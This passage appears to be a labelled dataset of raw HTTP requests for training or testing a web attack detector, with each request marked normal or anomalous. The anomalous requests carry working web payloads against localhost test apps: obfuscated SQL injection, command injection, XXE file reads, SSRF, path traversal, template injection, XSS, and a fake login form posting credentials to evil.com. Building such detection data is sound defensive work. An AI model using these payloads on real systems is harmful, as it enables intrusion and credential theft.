GET /rest/products/search?q=/%2f%23%0a%250d%250aSet-Cookie:crlf=injection; domain=evil.com HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=E5B89638DED01B61536FD28223B40B2D
Host: localhost:3000
Connection: close | anomalous | CRLF_Injection |
GET /rest/products/search?q=%2D%32%39%33%38%22%29%29%2F%2A%21%6F%52%2A%2F%28%2F%2A%21%53%65%4C%65%63%74%2A%2F%28%2F%2A%21%63%61%53%65%2A%2F%2F%2A%21%77%48%65%6E%2A%2F%28%35%32%37%38%3D%35%32%37%38%29%2F%2A%21%74%68%45%6E%2A%2F%2F%2A%21%4E%75%6C%4C%2A%2F%2F%2A%21%45%6C%73%65%2A%2F%63%41%73%54%28%28%43%68%52%28%31%31%33%29%7C%7C%43%68%52%28%31%30%32%29%7C%7C%43%68%52%28%31%30%30%29%7C%7C%43%68%52%28%37%37%29%29%2F%2A%21%41%73%2A%2F%2F%2A%21%6E%75%6D%65%52%49%63%2A%2F%29%2F%2A%21%45%6E%44%2A%2F%29%29%2F%2A%21%69%53%2A%2F%2F%2A%21%4E%75%6C%4C%2A%2F%2F%2A%21%41%6E%44%2A%2F%28%28%22%55%73%71%42%22%3D%22%55%73%71%42 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=021EF5FC3A3F9258A016540BE3297C3B
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 70
{"id": "gopher://%252e%252e%252f2130706433:27017", "action": "search"} | anomalous | Server_Side_Request_Forgery |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: <form action="/delete-account%20" method="PUT"><input type="hidden" name="new_password" value="eviluser"><input type="hidden" name="password" value="1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=A3DE108C700413C26EDC794D43D03726
Host: localhost
Connection: close | anomalous | Cross_Site_Request_Forgery |
GET /rest/products/search?q=%74%65%73%74%60%2F%2A%21%77%48%45%52%45%2A%2F%38%30%38%37%3D%38%30%38%37%2F%2A%21%41%6E%64%2A%2F%35%32%34%37%2F%2A%21%62%65%54%57%45%45%6E%2A%2F%35%32%34%37%2F%2A%21%41%6E%64%2A%2F%35%32%34%37%2D%2D%2F%2A%2A%2F%4F%65%58%70 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL_Injection |
GET /rest/products/search?q=%20%7C%5B%204%20-ne%20%24%28echo%20EEWDBT%20%7Ctr%20-d%20%27%5Cn%27%7Cwc%20-c%29%20%5D%7C%7Csleep%201%7C%7C HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproject.com)
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close | anomalous | Command_Injection |
GET /?ref=87f75c21-e841-4be9-a56e-c0de3d2f6533&session_token=6095 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 87f75c21-e841-4be9-a56e-c0de3d2f6533 | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 9061ec21-6ae9-47de-ab50-d6a31ee6a4c7 | normal | none |
GET /vulnerabilities/sqli/?id=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY p2 SYSTEM "php://filter/convert.base64-encode/resource=/etc/mysql/my.cnf"> ]><svg>&p2;</svg> HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=3916773A460465C8B920B5DDE66A7A5F
Host: localhost
Connection: close | anomalous | XML_External_Entity |
GET /rest/products/search?q=%74%65%73%74%27%7C%7C%28%2F%2A%21%73%65%6C%45%63%54%2A%2F%51%42%6B%70%2F%2A%21%46%72%4F%6D%2A%2F%2F%2A%21%64%55%61%6C%2A%2F%2F%2A%21%77%68%45%72%65%2A%2F%39%31%39%39%3D%39%31%39%39%2F%2A%21%61%4E%64%2A%2F%35%35%37%39%2F%2A%21%62%65%54%57%45%45%4E%2A%2F%28%2F%2A%21%73%65%6C%45%63%54%2A%2F%2F%2A%21%61%4E%64%2A%2F%28%73%65%6C%45%63%54%28%2F%2A%21%63%41%73%45%2A%2F%2F%2A%21%57%48%45%6E%2A%2F%28%35%35%37%39%3D%37%39%32%38%29%2F%2A%21%74%48%45%4E%2A%2F%35%35%37%39%2F%2A%21%45%4C%53%65%2A%2F%28%2F%2A%21%73%65%6C%45%63%54%2A%2F%37%39%32%38%2F%2A%21%75%6E%69%4F%6E%2A%2F%2F%2A%21%73%65%6C%45%63%54%2A%2F%38%39%39%39%29%2F%2A%21%45%6E%44%2A%2F%29%29%2D%2D%2F%2A%2A%2F%64%51%55%64 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 0b46c918-010b-41cc-b4e0-aebd86b237cc | normal | none |
POST /p/u/doAuthentication.do HTTP/1.0
Host: localhost:3000
bleed_attack: 2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 5
login | anomalous | Advanced_Vulnerability_Scan |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=FF62841D619312A00CE68021CA67A0C9
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 46
id=http%3A///./localhost%3A27017&submit=Submit | anomalous | Server_Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: fd035ad2-c175-4013-985c-9d8caa8f95bb | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=B69243EC810FD008B032A28531ECA5D3
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 93
{"id": "%c0.%c0.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts", "action": "search"} | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 606d2a5b-ab61-498a-8c16-94a7f1a5f2cb | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 4c203f58-8b4a-4c88-9bc9-f9ab5abf34c7 | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 34c6bf77-6d1a-4eec-9743-4c7f65cf0110 | normal | none |
GET /rest/products/search?q=%20%3BYUI=%24%28echo%20MXXYQY%29%3BYUI1=%24%7B%23YUI%7D%3Bif%20%5B%203%20-eq%20%24YUI1%20%5D%3Bthen%20sleep%201%3Bfi%7C%7C HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproject.com)
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close | anomalous | Command_Injection |
GET /rest/products/search?q=";return(true);var xyz='a') HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=4F4F9C3C58B33476167E547F142100E3
Host: localhost:3000
Connection: close | anomalous | NoSQL_Injection |
GET /vulnerabilities/sqli/?id=?page=+%0a%0dSet-Cookie:crlf=injection; Path=/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=AB2E92EDC46B36768D125DFB03767BEB
Host: localhost
Connection: close | anomalous | CRLF_Injection |
GET /?ref=7199ceff-6d1e-4715-97cc-2587b7c7876f&session_token=6423 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 7199ceff-6d1e-4715-97cc-2587b7c7876f | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: d952469f-df3b-4c66-84b6-1158091aee44 | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=CACCCF34FFF09C7BD456FDAABEE3124F
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 237
id=%25c0%25ee%25c0%25ee%25255c%25c0%25ee%25c0%25ee%25255c%25c0%25ee%25c0%25ee%25255c%25c0%25ee%25c0%25ee%25255c%25c0%25ee%25c0%25ee%25255c%25c0%25ee%25c0%25ee%25255cwindows%25255csystem32%25255cdrivers%25255cetc%25255chosts&submit=Submit | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Connection: close | anomalous | Advanced_Vulnerability_Scan |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=526F7F99BEB45C48ABE93B23DC3DD2E9
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 140
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>%f8%80%80%80%ae%f8%80%80%80%ae%bg%qfetc%bg%qfissue</id>
<name>admin</name>
</user> | anomalous | Directory_Traversal |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: ${{{ ''.__class__.__mro__[1].__subclasses__() }}}}}%0d%0a
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=E5B1364861622037F2D6098BA5EAA976
Host: localhost
Connection: close | anomalous | Server_Side_Template_Injection |
GET /rest/products/search?q=sale&cache_id=ca60fa01-5cd7-4548-af80-3f4ab24ebcab HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: ca60fa01-5cd7-4548-af80-3f4ab24ebcab | normal | none |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=BF010243CE3672F03DD06A3DBA173F45
Referer: http://malicious.com/ftp:///./localhost:5432
Host: localhost
Connection: close | anomalous | Server_Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 45af75ba-eb9f-4ca4-973a-6946c1e9147f | normal | none |
GET /vulnerabilities/sqli/?id=<b style="position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);font-size:70px;color: HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=0EFD4FD79CC1C2D951A26123AB79C8B6
Host: localhost
Connection: close | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: )(mail=*))(objectClass=*)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=C115E4C22F5057FF8375E5DD30BE88F6
Host: localhost
Connection: close | anomalous | LDAP_Injection |
GET /rest/products/search?q=<FRAMESET><FRAME SRC="javascript:javascript:alert(8641);"></FRAMESET> HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=B3CF837520DE40488F985E0A32D226F7
Host: localhost:3000
Connection: close | anomalous | Cross_Site_Scripting |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: e6a64b5f-4c9c-4649-a888-27db82015032 | normal | none |
POST /wp-admin/admin-ajax.php?template=../../../../../../../wp-config&value=a&min_symbols=1 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
action=woof_text_search& | anomalous | Advanced_Vulnerability_Scan |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=0AE03EA17B15C6BCA4E38A110B47CABF
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 277
{"id": "<iframe src=\"/change-role?<input type=\"hidden\" name=\"to_account\" value=\"superadmin\"><input type=\"hidden\" name=\"to_account27\" value=\"superadmin\"><input type=\"hidden\" name=\"user_id\" value=\"1\"\">\" style=\"display:none;\"></iframe>", "action": "search"} | anomalous | Cross_Site_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64: rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept-Encoding: gzip | anomalous | Advanced_Vulnerability_Scan |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=C27CB9A83688761BB7A85B5F421B8885
Referer: http://malicious.com/?.%f0%80%80%afboot.ini
Host: localhost
Connection: close | anomalous | Directory_Traversal |
GET /rest/products/search?q=%74%65%73%74%60%29%2F%2A%21%77%48%45%52%65%2A%2F%37%39%39%32%3D%37%39%39%32%3B%2F%2A%21%73%45%6C%65%43%54%2A%2F%44%42%4D%53%5F%50%49%50%45%2E%72%65%43%45%49%76%65%5F%6D%45%73%73%41%67%65%28%63%48%52%28%31%30%39%29%7C%7C%63%48%52%28%37%38%29%7C%7C%63%48%52%28%31%30%34%29%7C%7C%63%48%52%28%39%30%29%2C%35%29%2F%2A%21%66%52%4F%6D%2A%2F%2F%2A%21%44%55%41%6C%2A%2F%2D%2D%2F%2A%2A%2F%4E%4C%56%70 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=D48A9AE65281A887F522660297BCD29C
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 409
{"id": "<form action=\"https://evil.com/steal\" style=\"position:fixed;top:33%;left:53%;background:white;padding:30px;border:4px solid red;z-index:999999;box-shadow:0 0 20px red;\"><h2>Session Expired</h2>Username: <input name=\"uL9eO\"><br><br>Password: <input type=\"password\" name=\"pVASC\"><br><br><button style=\"background:red;color:white;padding:10px;\">Login Now</button></form>", "action": "search"} | anomalous | HTML_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=A8503C95946F1F2BA3E0009A2F187EFA
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 126
id=%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20ent%20file%3A//file%3A///%22/var/log/apache2/error.log%22%3E%20%5D%3E&submit=Submit | anomalous | XML_External_Entity |
GET /rest/products/search?q=%74%65%73%74%27%29%2F%2A%21%4F%72%2A%2F%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%37%32%34%35%2F%2A%2A%2F%66%52%4F%6D%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%43%6F%75%6E%54%28%2A%29%2C%63%4F%4E%43%41%54%28%30%78%37%31%37%30%36%32%36%62%37%31%2C%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%28%45%6C%54%28%37%32%34%35%2F%2A%21%42%45%74%77%45%65%4E%2A%2F%37%32%34%35%2F%2A%21%41%4E%64%2A%2F%37%32%34%35%2C%31%29%29%29%2C%30%78%37%31%36%32%37%30%37%61%37%31%2C%46%4C%4F%4F%72%28%52%41%4E%64%28%30%29%2A%32%29%29%78%2F%2A%21%66%52%4F%6D%2A%2F%49%4E%46%4F%72%4D%41%54%49%4F%4E%5F%53%43%48%45%4D%41%2E%2F%2A%21%50%4C%75%67%49%4E%73%2A%2F%2F%2A%21%67%72%4F%75%50%2A%2F%2F%2A%21%62%59%2A%2F%78%29%61%29%2D%2D%2F%2A%2A%2F%73%59%61%45 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: d63c4921-f59e-40c8-8d61-7b014562a3b6 | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=15DF970C346B9F8FC1E31490550DF83F
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 150
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id><div contenteditable onblur=Function`'alert`1`'```>xss</div></id>
<name>admin</name>
</user> | anomalous | Cross_Site_Scripting |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 49782ca1-7fe0-40eb-ac55-19bb7de01276 | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=077CFA08142B9E10238C73C95C805DB0
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 26
id=ua-pixels&submit=Submit | anomalous | Web_Cache_Deception |
GET /rest/products/search?q=<iFrAmE>HaCkEd bY AtTaCkEr</IfRaMe> HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
